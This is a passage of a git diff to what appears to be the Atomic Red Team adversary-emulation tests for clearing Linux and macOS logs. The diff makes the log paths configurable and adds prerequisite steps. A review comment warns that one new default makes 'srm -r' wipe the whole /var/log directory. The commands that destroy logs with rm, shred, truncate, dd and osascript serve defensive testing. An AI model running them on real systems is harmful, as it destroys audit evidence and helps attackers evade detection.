+ truncate --size=0 #{system_log_path} #size parameter \n"
 name: sh
 elevation_required: true
 - name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -3085,10 +3123,26 @@ defense-evasion:
 '
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
 executor:
 command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
 name: sh
 elevation_required: true
 - name: System log file deletion via find utility
@@ -3099,11 +3153,37 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_name1: + description: name or prefix of system log to delete. + type: string + default: system.log + system_log_name2: + description: name or prefix of system log to delete. + type: string + default: system.log.97.gz + system_log_name3: + description: name or prefix of system log to delete. + type: string + default: system.log.98.gz + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' + get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' executor: command: | - sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution - sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution - sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution + sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution + sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution + sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility @@ -3114,8 +3194,13 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" executor: - command: 'sudo echo '''' > /var/log/system.log + command: 'sudo echo '''' > #{system_log_path} ' name: sh 
@@ -3141,8 +3226,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo unlink /var/log/system.log + command: 'sudo unlink #{system_log_path} ' name: sh @@ -3155,8 +3256,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo shred -u -z -n 3 /var/log/system.log + command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh 
@@ -3169,10 +3286,31 @@ defense-evasion: Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + system_log_folder: + description: path to log parent folder + type: string + default: "/var/log/" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} #{system_log_folder} + + ' + get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} + #{system_log_folder}/system.log + + ' executor: command: | - sudo srm /var/log/system.log #system log file deletion - sudo srm -r /var/log/ #recursive deletion of log files + sudo srm #{system_log_path} #system log file deletion + sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript @@ -3184,8 +3322,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator + command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' 
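Review bot: With the new default `system_log_folder: "/var/log/"`, `sudo srm -r #{system_log_folder}` recursively removes the host's whole log directory rather than the single fixture the `get_prereq_command` creates, and there is still no `cleanup_command` to restore anything. If the recursive variant is wanted, the default should point at a dedicated fixture directory that the prereq creates (for example `default: "/var/log/atomic_t1070_002/"`, a constructed name) and a cleanup should remove it, so the test stays self-contained. Also, `#{system_log_folder}/system.log` in the prereq yields a doubled slash with a default that already ends in `/`; harmless, but dropping one avoids confusion.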
@@ -3199,8 +3353,24 @@ defense-evasion: Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"'' + command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index a78329a3..0f0d214d 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -58,18 +58,37 @@ Delete system and audit logs +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log| +| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo rm -rf /private/var/log/system.log* -sudo rm -rf /private/var/audit/* +sudo rm -rf #{syslog_path} +if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path} +``` +##### Get Prereq Commands: +```sh +touch #{syslog_path} +if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi +``` + +
@@ -94,7 +113,6 @@ This test deletes main log datastore, inflight log data, time-to-live data(TTL), ```sh sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content -sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log ``` @@ -117,18 +135,35 @@ This test truncates the system log files using the truncate utility with (-s 0 o +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path of system log to delete. | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo truncate -s 0 /var/log/system.log #size parameter shorthand -sudo truncate --size=0 /var/log/system.log #size parameter +sudo truncate -s 0 #{system_log_path} #size parameter shorthand +sudo truncate --size=0 #{system_log_path} #size parameter ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -146,18 +181,35 @@ The first sub-test truncates the log file to zero bytes via /dev/null and the se +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path of system log to delete. | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes -sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros) +sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes +sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -175,19 +227,38 @@ This test finds and deletes the system log files within /var/log/ directory usin +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_name1 | name or prefix of system log to delete. | string | system.log| +| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz| +| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution -sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution -sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution +sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution +sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution +sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} +``` +##### Get Prereq Commands: +```sh +touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} +``` + +
@@ -205,12 +276,17 @@ This test overwrites the contents of system log file with an empty string using +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo echo '' > /var/log/system.log +sudo echo '' > #{system_log_path} ``` @@ -261,17 +337,34 @@ This test deletes the system log file using unlink utility +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo unlink /var/log/system.log +sudo unlink #{system_log_path} ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -289,17 +382,34 @@ This test overwrites the contents of the log file with zero bytes(-z) using thre +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo shred -u -z -n 3 /var/log/system.log +sudo shred -u -z -n 3 #{system_log_path} ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -319,18 +429,36 @@ Refer: https://github.com/khell/homebrew-srm/issues/1 for installation +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| +| system_log_folder | path to log parent folder | string | /var/log/| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo srm /var/log/system.log #system log file deletion -sudo srm -r /var/log/ #recursive deletion of log files +sudo srm #{system_log_path} #system log file deletion +sudo srm -r #{system_log_folder} #recursive deletion of log files ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} #{system_log_folder} +``` +##### Get Prereq Commands: +```sh +mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log +``` + +
@@ -348,17 +476,34 @@ This test deletes the system log file using osascript via "do shell script"(sh/b +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges' +osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges' ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -378,17 +523,34 @@ Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"' +osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"' ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -406,18 +568,35 @@ The first sub-test deletes the journal files using rm utility in the "/var/log/j +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| journal_folder | path to journal logs | string | /var/log/journal| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content +sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{journal_folder} +``` +##### Get Prereq Commands: +```sh +mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal +``` + +
@@ -441,7 +620,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa | username | Username of mail spool | string | root| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash @@ -451,6 +630,18 @@ echo 0> /var/spool/mail/#{username} +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat /var/spool/mail/#{username} +``` +##### Get Prereq Commands: +```sh +touch /var/spool/mail/#{username} +``` + +
@@ -474,13 +665,17 @@ This test overwrites the specified log. This technique was used by threat actor | log_path | Path of specified log | path | /var/log/secure| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash echo 0> #{log_path} ``` +#### Cleanup Commands: +```bash +if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi +```